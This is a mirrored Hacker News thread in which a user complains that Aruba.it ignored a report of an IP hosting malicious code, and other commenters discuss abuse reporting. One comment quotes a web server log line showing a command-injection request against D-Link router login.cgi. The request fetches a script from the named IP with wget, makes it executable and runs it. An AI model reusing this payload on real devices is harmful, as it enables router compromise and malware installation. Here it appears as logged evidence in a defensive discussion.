TE
TechEcho
Home24h TopNewestBestAskShowJobs
GitHubTwitter
Home

TechEcho

A tech news platform built with Next.js, providing global tech news and discussions.

GitHubTwitter

Home

HomeNewestBestAskShowJobs

Resources

HackerNews APIOriginal HackerNewsNext.js

© 2025 TechEcho. All rights reserved.

Aruba.it blind to malicious code hosting

4 pointsby maxhqover 6 years ago
I tried to notify aruba.it of someone obviously hosting malicious code and trying to attack web servers: http:&#x2F;&#x2F;80.211.112.150&#x2F;k<p>(Reverse DNS resolves to their domain)<p>Their reaction? 1. in the chat they redirect me to dedicated hosting support form („only way to do it“) 2. Dedicated hosting support just closes my ticket.<p>Wow!

3 comments

cs02rm0over 6 years ago
I got this too (amongst other hosts).<p>nginx_1 | 197.39.15.48 - - [30&#x2F;Aug&#x2F;2018:14:51:22 +0000] &quot;GET &#x2F;login.cgi?cli=aa%20aa%27;wget%20<a href="http:&#x2F;&#x2F;80.211.112.150&#x2F;k%20-O%20&#x2F;tmp&#x2F;ks;chmod%20777%20&#x2F;tmp&#x2F;ks;sh%20&#x2F;tmp&#x2F;ks%27$" rel="nofollow">http:&#x2F;&#x2F;80.211.112.150&#x2F;k%20-O%20&#x2F;tmp&#x2F;ks;chmod%20777%20&#x2F;tmp&#x2F;ks...</a> HTTP&#x2F;1.1&quot; 400 173 &quot;-&quot; &quot;LMAO&#x2F;2.0&quot; &quot;-&quot;<p>Apparently targeting dlink routers - <a href="https:&#x2F;&#x2F;twitter.com&#x2F;txalin&#x2F;status&#x2F;1007625620090707974?lang=en" rel="nofollow">https:&#x2F;&#x2F;twitter.com&#x2F;txalin&#x2F;status&#x2F;1007625620090707974?lang=e...</a>
HelloNurseover 6 years ago
You are dealing with customer support for some Aruba customer, i.e. not you. Why don&#x27;t you contact police or the site owner instead?<p>If it&#x27;s a hacked server, the owner has to notice the hack and ask for help cleaning up if necessary. You have no authority whatsoever, and if you attempt to stir up trouble about someone&#x27;s web site, closing tickets is at the polite end of the response spectrum. You risk prosecution.<p>If it&#x27;s a brazen criminal using their own host, they are the customer and the site is working as expected. No customer support required.
评论 #17879636 未加载
hotpotjunkieover 6 years ago
There&#x27;s basically nothing you can do besides notify their abuse desk and probably get ignored, because abuse desks pay little attention to one-off complaints like that. If they do get taken down, it&#x27;ll be by one of the larger security companies who detect the page (for example, if that IP sends spam) and includes it in their feed of bad IP&#x27;s to aruba.